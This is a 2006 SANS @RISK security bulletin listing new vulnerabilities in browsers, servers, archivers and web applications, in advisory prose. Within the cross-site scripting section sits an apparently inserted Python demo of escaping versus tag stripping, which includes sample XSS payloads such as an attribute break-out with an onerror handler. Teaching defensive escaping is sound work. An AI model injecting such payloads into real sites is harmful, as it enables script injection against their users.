@RISK: The Consensus Security Vulnerability Alert

Volume: V, Issue: 17
May 1, 2006

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    Category                                  # of Updates & Vulnerabilities
    Other Microsoft Products                  3 (#3, #5)
    Third Party Windows Apps                  11 (#7)
    Mac OS                                    1
    Linux                                     2
    Solaris                                   1
    Unix                                      4 (#9)
    Cross Platform                            15 (#1, #2, #6, #8)
    Web Application - Cross Site Scripting    9
    Web Application - SQL Injection           9
    Web Application                           13 (#4)
    Network Device                            4

************************** Sponsored By Sourcefire *****************************

Sourcefire, the creator of Snort®, is offering the Open Source Snort community two comprehensive courses: "Snort: Building and Operating" and "Snort Rules."

Purchase both Snort courses either as an instructor-led or 60-day online training bundle and receive a FREE Snort Certified Professional exam (save $395).

For more information: http://www.sans.org/info.php?id=1129

Contact Sourcefire Training at 800.501.6008 or at: http://www.sans.org/info.php?id=1130

********************************************************************************

July 5-13 - Bring your family for the fireworks and stay for SANS' largest conference in Washington.

The industry's best security courses - extraordinary faculty; authoritative up-to-the-minute material - show you how to do the job and give you the confidence to go back and do it immediately.

"Jacked my paranoia level up around my ears, and then gave me the tools to manage the threat." (Don Geiger, DCPS Division of Technology)

Offers every one of SANS' 17 immersion training courses plus 12 short courses and a big exposition: SANS Security Essentials, Hacker Exploits, System Forensics, Intrusion Detection, Auditing, plus training for the CISSP exam and all technical certifications required for DoD 8570 and more. Plus special evening sessions by the global security leaders who staff the Internet Storm Center.

http://www.sans.org/sansfire06/

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Other Microsoft Products
Third Party Windows Apps
Mac OS
Linux
Solaris
Unix
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device

**************************** Sponsored Link: ***********************************

1) Free SANS First Wednesday Webcast this week - "Web Application Security" Wednesday, May 03 at 1:00 PM EDT (1700 UTC/GMT) http://www.sans.org/info.php?id=1131

********************************************************************************

PART I Critical Vulnerabilities

Part I is compiled by Rohit Dhamankar and Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (1) HIGH: Firefox JavaScript Remote Code Execution Vulnerability
  • Affected:
    • Firefox version 1.5.0.2 and prior
  • Description: Firefox reportedly contains a buffer overflow in handling the "iframe.contentWindow.focus()" JavaScript function. A specially crafted webpage can exploit this flaw to execute arbitrary code on a user's system. Proof-of-concept exploit code, which crashes Firefox, has been publicly posted.

  • Status: Vendor has not confirmed, no patches available yet.

  • References:
  • (3) MODERATE: Internet Explorer Modal Dialog Code Execution
  • Affected:
    • Internet Explorer, all versions
  • Description: A security researcher has reported a flaw in Internet Explorer that can be exploited to install arbitrary programs such as keystroke loggers, adware or spyware on a user's system with minimal user interaction. The problem arises because Internet Explorer contains a race condition in handling "modal dialogs". These dialogs are used to request user input for a security-related action such as downloading a program. By exploiting this vulnerability, a maliciously crafted webpage can influence the modal dialog decision and compromise a client system. Exploit code has not been publicly posted.

  • Status: Microsoft has fixed a particular attack vector for this vulnerability in MS05-054. However, according to the researcher, this patch does not fully address the vulnerability. Microsoft is aware of the flaw. No updates are available yet. A workaround is to set the security settings in Internet Explorer to either "enable" or "disable" rather than "prompt". This will prevent the opening of modal dialog boxes. A general workaround to prevent Internet Explorer from installing programs is to run Internet Explorer with limited privileges. Microsoft's "DropMyRights" tool can be used for this purpose.

  • References:
  • (4) MODERATE: PHP wordwrap() Function Buffer Overflow
  • Affected:
    • PHP version 4.4.2 and prior
    • PHP version 5.1.2 and prior
  • Description: PHP is a package installed on a large number of web servers and used by multiple content management and bulletin board software packages. The PHP "wordwrap()" function, which wraps a string to a given number of characters using a string break character, reportedly contains a buffer overflow. Any PHP scripts that use this function and pass user input to it are vulnerable. The flaw can be exploited to execute arbitrary code on the webserver hosting such scripts. Note that hosting sites should upgrade the PHP packages as soon as a fix is available.

  • Status: Vendor has not confirmed, no updates available.

  • References:
  • (5) UPDATE: Internet Explorer Nested Object Tag Memory Corruption
  • Description: Secunia Research has verified that a variation of the publicly reported 0-day IE vulnerability can be exploited to execute arbitrary code on a fully patched Windows XP SP2 system. The technical details of this attack vector have not been publicly posted. Microsoft is reportedly working on a fix.

  • References:
Other Software
  • (7) HIGH: Juniper Networks SSL-VPN Client Buffer Overflow
  • Affected:
    • Juniper SSL-VPN JuniperSetup Control
  • Description: SSL-VPN is an access technology designed for secure remote access. Accessing non-web applications remotely in this fashion requires that the clients have an ActiveX control installed on their systems. The Juniper SSL-VPN client ActiveX control, JuniperSetup.ocx, contains a stack-based buffer overflow in its "JuniperSetupDLL.dll" module. Passing an overlong "ProductName" to this module triggers the overflow, which can be exploited to execute arbitrary code on a system running the Juniper SSL-VPN client software. The technical details required to craft an exploit have been publicly posted.

  • Status: Juniper confirmed, patch available.

  • References:
  • (8) HIGH: Ethereal Multiple Protocol Decoding Vulnerabilities
  • Affected:
    • Ethereal version 0.8.5 through 0.10.14
  • Description: Ethereal is a very popular open source network sniffer and protocol analyzer for Unix and Windows platforms. The software contains one or more buffer overflow vulnerabilities in parsing the COPS and ALCAP protocols as well as in handling Network Instruments and NetXRay/Windows sniffer files. These buffer overflows can be exploited to execute arbitrary code with the privileges of the ethereal process (typically "root" when ethereal is being used as a sniffer). To exploit these flaws, an attacker has to either inject the malicious packets into the network traffic being sniffed by ethereal, or entice a user to open a specially crafted packet capture file. Note that any network applications based on Ethereal's protocol decoder modules may also be affected.

  • Status: Vendor confirmed, upgrade to version 0.99.0, which also fixes a number of DoS vulnerabilities in parsing other protocols.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 17, 2006

This list is compiled by Qualys (www.qualys.com) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 4995 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

  • 06.17.1 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer Nested OBJECT Tag Memory Corruption
  • Description: Microsoft Internet Explorer is prone to a memory corruption vulnerability. This issue is due to flawed handling of malformed HTML content. HTML content that contains nested <OBJECT> tags without corresponding </OBJECT> closure tags may trigger this issue. This issue reportedly causes a NULL pointer dereference in the "mshtml.dll" library, crashing Internet Explorer. An attacker could exploit this issue via a malicious web page to potentially execute arbitrary code in the context of the currently logged-in user. Microsoft Internet Explorer 6 for Microsoft Windows XP SP2 is reportedly vulnerable to this issue.
  • Ref: http://www.securityfocus.com/archive/1/431796

  • 06.17.2 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer Modal Dialog Manipulation
  • Description: Internet Explorer is prone to a remote code execution vulnerability through exploiting a race condition when displaying modal security dialog boxes. This issue presents itself when web pages attempt to cause actions to be carried out that result in a modal security dialog being displayed, requesting permission for the action from users. Attackers may attempt to coerce users into clicking on an object, or pressing specific key sequences, while simultaneously attempting an action that will result in a dialog box being displayed. This issue may be exploited to cause users to inadvertently allow remote code to be executed.
  • Ref: http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0759.html

  • 06.17.3 - CVE: Not Available
  • Platform: Other Microsoft Products
  • Title: Internet Explorer MHTML URI Handler Information Disclosure
  • Description: Microsoft Internet Explorer is vulnerable to a cross domain information disclosure issue because the browser fails to correctly handle redirections with the "mhtml:" URI handler. See the reference for further details.
  • Ref: http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/ http://www.securityfocus.com/bid/17717

  • 06.17.4 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: iOpus Secure Email Attachments Encryption Weakness
  • Description: iOpus Secure Email Attachments is an application used to create self-extracting, encrypted email attachments. It is vulnerable to an insecure encryption weakness due to a design flaw in the encryption algorithm used. All versions of iOpus Secure Email Attachments are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431904

  • 06.17.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Skulltag Remote Format String
  • Description: Skulltag is a Doom engine for Windows. It is reported prone to a remote format string vulnerability. A client can supply a specially-crafted version string containing format specifiers to execute malicious code. Skulltag version 0.96f is affected.
  • Ref: http://www.securityfocus.com/archive/1/431872

  • 06.17.6 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: IZArc Hostile Destination Path
  • Description: IZArc is a file compression/decompression application. It contains a vulnerability in the handling of pathnames in archived files. By specifying a path for an archived item that points outside the expected destination directory, the creator of the archive can cause the file to be extracted to arbitrary locations on the filesystem. IZArc version 3.5 beta 3 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/17664/references

  • 06.17.7 - CVE: CVE-2006-2007
  • Platform: Third Party Windows Apps
  • Title: Winny File Transfer Heap Overflow
  • Description: Winny is a peer-to-peer file sharing application. It is vulnerable to a remote heap overflow issue because the application fails to perform bounds checking on a "strcpy()" operation during file transfers. Winny versions 2.0 b7.1 and earlier are vulnerable.
  • Ref: http://www.eeye.com/html/research/advisories/AD20060421.html

  • 06.17.8 - CVE: CVE-2006-1951
  • Platform: Third Party Windows Apps
  • Title: SolarWinds TFTP Server Directory Traversal
  • Description: TFTP Server is a TFTP protocol server for various Microsoft Windows platforms. TFTP Server is prone to a directory traversal vulnerability. The application does not properly sanitize user-supplied input of directory traversal strings "../../" allowing an attacker to specify arbitrary files for download. This may facilitate a complete compromise of the affected computer as the application is typically run with SYSTEM privileges.
  • Ref: http://www.rapid7.com/advisories/R7-0019.html

  • 06.17.9 - CVE: CVE-2006-2027
  • Platform: Third Party Windows Apps
  • Title: Pablo Software Solutions Quick 'n Easy FTP Server Logging Buffer Overflow
  • Description: Quick 'n Easy FTP Server is an FTP server for Windows. Quick 'n Easy FTP Server is prone to a buffer overflow vulnerability. To exploit this issue, an administrator must visit the log viewing portion of the application, as the issue is conjectured to be triggered in the log display functionality. The affected portion of the application converts the attacker-supplied log text to Unicode to display it for the administrator, complicating exploits. Quick 'n Easy FTP Server versions 3.0 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/431920

  • 06.17.10 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: PowerISO Directory Traversal
  • Description: PowerISO is an ISO, BIN, NRG, IMG and DAA file archiving application. It is vulnerable to a directory traversal issue when the application processes malicious ISO and BIN archives. PowerISO version 2.9 is vulnerable.
  • Ref: http://secway.org/advisory/AD20060428.txt

  • 06.17.11 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Multiple SpeedProject Products ACE Archive Filename Handling Buffer Overflow
  • Description: SpeedProject's products called Squeez and SpeedCommander both contain support for decompressing ACE archives. Multiple SpeedProject products are prone to a buffer-overflow vulnerability. This issue is exposed when the application extracts an ACE archive that contains a file with a long name. Squeez version 5.10 Build 4460 and SpeedCommander versions 10.52 Build 4450 and 11.01 Build 4450 are affected by this issue.
  • Ref: http://www.securityfocus.com/archive/1/432101

  • 06.17.12 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Juniper SSL-VPN Client ActiveX Control Remote Buffer Overflow
  • Description: Juniper provides an SSL-VPN client in the form of an ActiveX control for Microsoft Windows. It is prone to a buffer overflow vulnerability due to the use of unbounded memory-copy operations in the "JuniperSetupDLL.dll" library, which is loaded from the "JuniperSetup.ocx" ActiveX control. Arbitrary code would be executed in the context of the client application.
  • Ref: http://www.securityfocus.com/archive/1/432155

  • 06.17.13 - CVE: CVE-2006-1952
  • Platform: Third Party Windows Apps
  • Title: WinAgents TFTP Server Directory Traversal
  • Description: WinAgents TFTP Server is a TFTP protocol server. It is vulnerable to a directory traversal issue due to insufficient sanitization of ".../.../" strings. WinAgents TFTP Server versions 3.1 and earlier are vulnerable.
  • Ref: http://www.rapid7.com/advisories/R7-0020.html

  • 06.17.14 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: MagicISO Directory Traversal
  • Description: MagicISO is an ISO and BIN file archiving application. It is vulnerable to a directory traversal issue when the application processes malicious ISO and BIN archives. MagicISO version 5.0 Build 0166 is vulnerable.
  • Ref: http://secway.org/advisory/AD20060428.txt

  • 06.17.15 - CVE: Not Available
  • Platform: Mac OS
  • Title: Apple Safari Web Browser Rowspan Denial of Service
  • Description: Apple Safari web browser is prone to a denial of service vulnerability. The problem occurs when malicious HTML containing an excessively large "rowspan" value is viewed. An attacker can exploit this issue to consume excessive system resources and eventually crash an affected browser. Apple Safari versions 2.0.3 and earlier are affected.
  • Ref: http://www.yanux.ch/exploits/safari/bugreport_imac_g4.txt

  • 06.17.16 - CVE: CVE-2006-1513
  • Platform: Linux
  • Title: ABC2PS ABC Music Files Remote Buffer Overflow
  • Description: ABC2PS is a translator application for converting ABC music description files into PostScript. It is vulnerable to a remote buffer overflow issue due to insufficient boundary checks before copying user-supplied data into process buffers. ABC2PS version 1.3.3 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/17689

  • 06.17.17 - CVE: Not Available
  • Platform: Linux
  • Title: abcMIDI ABC Music Files Remote Buffer Overflow
  • Description: abcMIDI is a package that contains the "yaps" program, which is a translator application for converting ABC music description files into PostScript. It is prone to a remote buffer overflow vulnerability when the application handles a specially-crafted ABC music description file.
  • Ref: http://www.securityfocus.com/bid/17704

  • 06.17.18 - CVE: CVE-2006-2064
  • Platform: Solaris
  • Title: Solaris PKCS#11 Library Local Privilege Escalation
  • Description: Sun Solaris supports PKCS#11 (Public Key Cryptography Standards, standard number 11, a cryptographic token API). It is vulnerable to a local privilege escalation issue due to a failure of the PKCS#11 library to properly utilize non-reentrant functions. Sun Solaris versions 10 and 10_x86 are vulnerable.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102316-1

  • 06.17.19 - CVE: CVE-2006-0048
  • Platform: Unix
  • Title: Tcpick Write.C Remote Denial of Service
  • Description: Tcpick is a TCP stream sniffer, tracker and capturer. It is susceptible to a remote denial of service vulnerability. This issue is due to the application's failure to properly handle specially-crafted packets. The problem occurs in "write.c" when the application is running with the "-yP" option.
  • Ref: http://sourceforge.net/mailarchive/forum.php?thread_id=9989610&forum_id=37151

  • 06.17.20 - CVE: Not Available
  • Platform: Unix
  • Title: Fenice Remote Buffer Overflow and Denial of Service Vulnerabilities
  • Description: Fenice is an Open Media Streaming server application. It is vulnerable to multiple remote issues such as a buffer overflow and denial of service. See the reference for further details. Fenice version 1.10 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/431870

  • 06.17.21 - CVE: Not Available
  • Platform: Unix
  • Title: DeleGate DNS Response Denial of Service
  • Description: DeleGate is prone to a remote denial of service vulnerability. The application fails to properly handle malformed DNS responses. An attacker can exploit this issue to crash the affected service, effectively denying service to legitimate users. The vendor has addressed this issue in versions 8.11.6 and 9.0.6.
  • Ref: http://www.niscc.gov.uk/niscc/docs/re-20060425-00312.pdf?lang=en

  • 06.17.22 - CVE: Not Available
  • Platform: Unix
  • Title: Paul A. Rombouts PDNSD DNS Query Denial of Service
  • Description: The pdnsd DNS server is prone to a remote denial of service vulnerability. The application fails to properly handle malformed DNS queries. The problem occurs when unsupported DNS QTYPE or QCLASS queries are sent to the affected DNS server. When the affected server handles these packets, a memory leak occurs. The vendor has addressed this issue in version 1.2.4-par.
  • Ref: http://www.niscc.gov.uk/niscc/docs/re-20060425-00312.pdf?lang=en

  • 06.17.23 - CVE: CVE-2006-1998, CVE-2006-1999
  • Platform: Cross Platform
  • Title: OpenTTD Multiple Denial of Service Vulnerabilities
  • Description: OpenTTD is a multiplayer role-playing game for multiple operating systems and is an open source clone of Transport Tycoon Deluxe. OpenTTD is prone to multiple remote denial of service vulnerabilities.
  • Ref: http://aluigi.altervista.org/adv/openttdx-adv.txt

  • 06.17.24 - CVE: CVE-2006-2017
  • Platform: Cross Platform
  • Title: Dnsmasq Broadcast Reply Denial of Service
  • Description: Dnsmasq is a DHCP and DNS server. It is vulnerable to a remote denial of service issue due to a design error in the application when receiving a DHCP client broadcast reply request. Dnsmasq version 2.29 is vulnerable.
  • Ref: http://thekelleys.org.uk/dnsmasq/CHANGELOG

  • 06.17.25 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Blender BVF File Import Python Code Execution
  • Description: Blender is a 3D modeling application. It is vulnerable to a Python code execution issue due to insufficient sanitization of user-supplied input passed to "eval" statements. Blender version 2.36 is vulnerable.
  • Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=330895

  • 06.17.26 - CVE: CVE-2006-0580
  • Platform: Cross Platform
  • Title: Lotus Domino Unspecified LDAP Denial of Service
  • Description: IBM Lotus Domino Server is an application framework for web-based collaborative software. It is vulnerable to an unspecified denial of service issue when malformed data is sent to the LDAP server on TCP port 389. IBM Lotus Domino version 7.0 is vulnerable.
  • Ref: http://www.gleg.net/flash/protover_lotus.html

  • 06.17.27 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Symantec AntiVirus Scan Engine Multiple Remote Vulnerabilities
  • Description: Symantec AntiVirus Scan Engine is a TCP/IP server and programming interface that enables third parties to incorporate support for Symantec content-scanning technologies into their proprietary applications. It is susceptible to multiple remote vulnerabilities. The first issue is due to the application's failure to properly authenticate web-based user logins. The second issue is due to the application's use of a static private DSA encryption key for SSL communication. The third issue is due to the application's failure to properly secure files containing potentially sensitive information from remote access. Version 5.0 of Symantec AntiVirus Scan Engine is affected by these vulnerabilities.
  • Ref: http://www.symantec.com/avcenter/security/Content/2006.04.21.html

  • 06.17.28 - CVE: Not Available
  • Platform: Cross Platform
  • Title: @1 Event Publisher Information Disclosure
  • Description: @1 Event Publisher is an event-management application. The application fails to secure access to the "eventpublisher.txt" file, allowing an attacker to obtain sensitive information from a log of private user comments. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/17647

  • 06.17.29 - CVE: CVE-2006-1931
  • Platform: Cross Platform
  • Title: Ruby WEBrick HTTP Server Denial of Service
  • Description: Ruby is an object-oriented scripting language. It is vulnerable to a denial of service issue in the WEBrick HTTP server due to the use of blocking sockets. Ruby versions 1.8.2 and earlier are vulnerable.
  • Ref: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=189540

  • 06.17.30 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Mozilla Firefox iframe.contentWindow.focus Buffer Overflow
  • Description: Mozilla Firefox is prone to a buffer overflow vulnerability. This issue occurs when the browser renders JavaScript using the "js320.dll" and "xpcom_core.dll" libraries. Specifically, a malformed "iframe.contentWindow.focus()" call can cause an overflow to occur. This could lead to a failure of the browser or potential arbitrary code execution in the context of the current user. Firefox versions 1.5.0.2 and earlier running on Windows and Linux are affected.
  • Ref: http://www.securityfocus.com/bid/17671

  • 06.17.31 - CVE: CVE-2006-1997
  • Platform: Cross Platform
  • Title: Sybase Pylon Anywhere Unauthorized Access
  • Description: Sybase Pylon Anywhere is an application that allows users to access Microsoft Exchange and Lotus Notes information remotely from a PDA or smartphone. It is vulnerable to an unspecified access validation issue. Pylon Anywhere versions 6.4.9 and earlier are vulnerable.
  • Ref: http://www.sybase.com/detail?id=1040213

  • - CVE: CVE-2006-1932, CVE-2006-1933, CVE-2006-1934, CVE-2006-1936, CVE-2006-1937, CVE-2006-1938, CVE-2006-1940
  • Platform: Cross Platform
  • Title: Ethereal Multiple Protocol Dissector Vulnerabilities
  • Description: Ethereal is a multi-platform network protocol sniffer and analyzer. Several vulnerabilities have been reported in various protocol dissectors. Ethereal could crash while reading a malformed sniffer capture, an invalid display filter and a specially-crafted statistics counter. These issues could allow remote attackers to execute arbitrary machine code in the context of the vulnerable application. Various vulnerabilities affect differing versions of Ethereal from 0.8.5 through to 0.10.14.
  • Ref: http://www.ethereal.com/appnotes/enpa-sa-00023.html

  • 06.17.33 - CVE: Not Available
  • Platform: Cross Platform
  • Title: ISC BIND TSIG Zone Transfer Denial of Service
  • Description: ISC BIND is prone to a remote denial of service vulnerability. This issue is due to a failure in the application to properly handle malformed TSIG (Secret Key Transaction Authentication for DNS) replies. This issue is triggered when BIND is configured with TSIG enabled, and it attempts to parse malformed TSIG messages during zone transfers.
  • Ref: http://www.securityfocus.com/bid/17692

  • 06.17.34 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Oracle 10g DBMS_EXPORT_EXTENSION SQL Injection
  • Description: Oracle 10g products are prone to a SQL injection vulnerability. This issue exists in the "GET_DOMAIN_INDEX_METADATA" function of the "DBMS_EXPORT_EXTENSION" package. Due to improper input validation, a remote attacker with access to the database can elevate their privilege level to those of the DBA. This vulnerability has not been patched.
  • Ref: http://www.securityfocus.com/archive/1/432078

  • 06.17.35 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Multiple Hitachi JP1 Products Denial of Service
  • Description: Multiple JP1 products are prone to a denial of service vulnerability. These issues occur when the affected applications receive requests or data unexpectedly. An attacker can exploit this issue to cause affected products to become unresponsive, resulting in a denial of service to legitimate users. Specific models and versions are listed in the reference link.
  • Ref: http://www.hitachi-support.com/security_e/vuls_e/HS06-007_e/index-e.html

  • 06.17.36 - CVE: Not Available
  • Platform: Cross Platform
  • Title: PowerDNS Malformed EDNS0 Packet Remote Denial of Service
  • Description: PowerDNS is a nameserver application. It is vulnerable to a denial of service issue due to insufficient handling of malformed EDNS0 packets. PowerDNS version 3.0 is vulnerable.
  • Ref: http://wiki.powerdns.com/projects/trac/changeset/760

  • 06.17.37 - CVE: Not Available
  • Platform: Cross Platform
  • Title: BL4 SMTP Server Buffer Overflow
  • Description: BL4 SMTP Server is a Mail Transfer Agent (MTA) server for Linux and Unix-like operating systems. It is susceptible to a remote buffer overflow vulnerability in its SMTP service when attackers repeatedly send more than 2100 bytes of data as an argument to the "HELO", "MAIL FROM" and "RCPT TO" commands. BL4 SMTP Server versions prior to 0.1.5 are affected.
  • Ref: http://www.securityfocus.com/archive/1/432329

  • 06.17.38 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Scry Gallery Index.PHP Cross-Site Scripting
  • Description: Scry Gallery is an image gallery application. Insufficient sanitization of the "p" parameter in the "index.php" script exposes the application to a cross-site scripting issue. Scry Gallery version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/17668

  • 06.17.39 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Simplog ImageList.PHP Cross-Site Scripting
  • Description: Simplog is a weblog application. Insufficient sanitization of the "imagedir" parameter in the "imagelist.php" script exposes the application to a cross-site scripting issue. Simplog version 0.9.3 is affected.
  • Ref: http://www.securityfocus.com/bid/17653

  • 06.17.40 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: @1 Event Publisher Multiple HTML Injection Vulnerabilities
  • Description: @1 Event Publisher is an event notification application implemented in Perl. @1 Event Publisher is prone to multiple HTML injection vulnerabilities. @1 Event Publisher 2003.12.18 is affected.
  • Ref: http://www.securityfocus.com/bid/17646

  • 06.17.41 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: LogMethods A2Z.JSP Cross-Site Scripting
  • Description: LogMethods is a bookmark portal application. Insufficient sanitization of the "kwd" parameter in the "/lms/a2z.jsp" script exposes the application to a cross-site scripting issue. LogMethods versions 0.9 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/17675

  • 06.17.42 - CVE: CVE-2006-2051
  • Platform: Web Application - Cross Site Scripting
  • Title: NextAge Shopping Cart Multiple HTML Injection Vulnerabilities
  • Description: NextAge Shopping Cart is a shopping cart application implemented in PHP. NextAge Shopping Cart is prone to multiple HTML injection vulnerabilities.
  • Ref: http://www.securityfocus.com/archive/1/431983

  • 06.17.43 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Instant Photo Gallery Multiple Cross-Site Scripting Vulnerabilities
  • Description: Instant Photo Gallery is a web-based photo album application. It is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input to the "member.php", "portfolio.php" and "portfolio_photo_popup.php" scripts. Instant Photo Gallery version 1.0 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/432024

  • 06.17.44 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: CuteNews Multiple Cross-Site Scripting Vulnerabilities
  • Description: CuteNews is a news reader application. Insufficient sanitization of the "mod" and "source" parameters of the "index.php" script exposes the application to multiple cross-site scripting issues. CuteNews version 1.4.1 is affected.
  • Ref: http://www.securityfocus.com/bid/17700

  • 06.17.45 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: FarsiNews Multiple Cross-Site Scripting Vulnerabilities
  • Description: FarsiNews is a news reader application implemented in PHP. It is prone to multiple cross-site scripting vulnerabilities.
  • Ref: http://www.securityfocus.com/archive/1/432109

  • 06.17.46 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: DevBB Member.PHP Cross-Site Scripting
  • Description: DevBB is a web-based bulletin board application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "member" parameter of the "member.php" script. DevBB version 1.0 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/432096
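The cross-site scripting entries above (LogMethods "kwd", CuteNews "mod"/"source", DevBB "member" and the rest) all come down to the same defect: a request parameter is echoed into HTML without output encoding for the context it lands in. The Python below is an added example, not code from the newsletter or from any product listed here; it shows why the common "strip the <script> tags" fix is insufficient and what context-aware escaping does instead. The rendered form, the parameter name "kwd" and the payloads are constructed for illustration.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample inputs for a search-keyword parameter such as "kwd".
# The payloads are generic examples of the vulnerability class, not taken
# from any advisory.
SAMPLE_INPUTS = [
    'perl',
    '<script>alert(1)</script>',
    '"><img src=x onerror=alert(1)>',
]


def render_naive(kwd):
    """Vulnerable pattern: strip literal <script> tags, then echo the value
    into an attribute.  Tag stripping is the kind of 'insufficient
    sanitization' the entries above describe; it does nothing about
    breaking out of the attribute with a quote character."""
    cleaned = re.sub(r'(?i)</?script[^>]*>', '', kwd)
    return f'<input type="text" name="kwd" value="{cleaned}">'


def render_escaped(kwd):
    """Hardened: encode for the context the value lands in (a double-quoted
    HTML attribute) instead of trying to remove 'bad' substrings."""
    return f'<input type="text" name="kwd" value="{html.escape(kwd, quote=True)}">'


class _TagCollector(HTMLParser):
    """Collects start tags and on* attributes so a test can tell whether the
    rendered fragment still contains only the single intended element."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith('on'))


def injected_markup(rendered):
    """True if the fragment contains any element beyond the one <input>, or
    any on* event-handler attribute, i.e. the input changed the markup."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return parser.tags != ['input'] or bool(parser.handlers)


def demo():
    """For each sample input: (naive rendering injects?, escaped rendering injects?)."""
    return {
        kwd: (injected_markup(render_naive(kwd)), injected_markup(render_escaped(kwd)))
        for kwd in SAMPLE_INPUTS
    }


if __name__ == '__main__':
    for kwd, (naive, escaped) in demo().items():
        print(f'{kwd!r:40} naive_injects={naive} escaped_injects={escaped}')
```

The point of the check is that the filter "works" against the obvious <script> payload and still fails against the attribute break-out, which is the usual way a blacklist-based fix gets bypassed. The durable fix is encoding on output for each context (attribute, element body, JavaScript string, URL), not pattern matching on input.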

  • 06.17.47 - CVE: CVE-2006-2009
  • Platform: Web Application - SQL Injection
  • Title: PHPMyAgenda Agenda.PHP3 Remote File Include
  • Description: phpMyAgenda is a web application for managing events. It is implemented in PHP. phpMyAgenda is prone to a remote file include vulnerability. phpMyAgenda 3.0 Final and prior versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/431862

  • 06.17.48 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Simplog Multiple SQL Injection Vulnerabilities
  • Description: Simplog is a web-based news application written in PHP. It is prone to multiple SQL injection vulnerabilities due to improper sanitization of user-supplied input. Simplog versions 0.9.3 and earlier are vulnerable to these issues.
  • Ref: http://www.securityfocus.com/archive/1/431760

  • 06.17.49 - CVE: CVE-2006-2004
  • Platform: Web Application - SQL Injection
  • Title: RI Blog Multiple SQL Injection Vulnerabilities
  • Description: RI Blog is a weblog application. The application is prone to multiple SQL injection vulnerabilities because it fails to properly sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/bid/17654

  • 06.17.50 - CVE: CVE-2006-2039
  • Platform: Web Application - SQL Injection
  • Title: Help Center Live OSTicket Module Multiple SQL Injection Vulnerabilities
  • Description: Help Center Live is a helpdesk application implemented in PHP. The application is prone to multiple SQL injection vulnerabilities because it fails to properly sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/bid/17676

  • 06.17.51 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Photokorn Multiple SQL Injection Vulnerabilities
  • Description: Photokorn is a photo album application. Insufficient sanitization of user-supplied input to various PHP scripts exposes the application to multiple SQL injection issues. Photokorn versions 1.542 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/17683

  • 06.17.52 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Invision Power Board Index.PHP CK Parameter SQL Injection
  • Description: Invision Power Board is web forum software. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "ck" parameter of the "index.php" script. Invision Power Board versions 2.1.5 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/431990

  • 06.17.53 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: DUPortal Pro Cat.ASP SQL Injection
